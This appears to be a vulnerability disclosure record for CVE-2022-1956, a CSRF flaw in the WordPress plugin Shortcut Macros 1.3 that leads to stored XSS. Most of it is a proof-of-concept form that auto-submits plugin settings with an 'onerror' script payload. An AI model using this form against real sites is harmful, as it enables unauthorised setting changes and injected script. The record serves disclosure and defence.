CVE: CVE-2022-1956

Name: Shortcut Macros (shortcut-macros)

Version: 1.3

Date: 2022-04-18 17:20:41

Advisory: https://wpscan.com/vulnerability/ef6d0393-0ce3-465c-84c8-53bf8c58958a

Type: CSRF

Exploit: 


CSRF, also possible with subscriber role. Leads to stored XSS.

<form action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="ak_action" value="update_aksm_settings">
    <input type="text" name="aksm_k_1" value="aaa">
    <input type="text" name="aksm_v_1" value="hacked">
    <input type="text" name="aksm_k_2" value="bbb">
    <input type="text" name="aksm_v_2" value="<img src=x onerror=alert(1)>">
    <input type="text" name="submit_button" value="Update Shortcut Macros">
</form>
<script>
    document.forms[0].submit();
</script>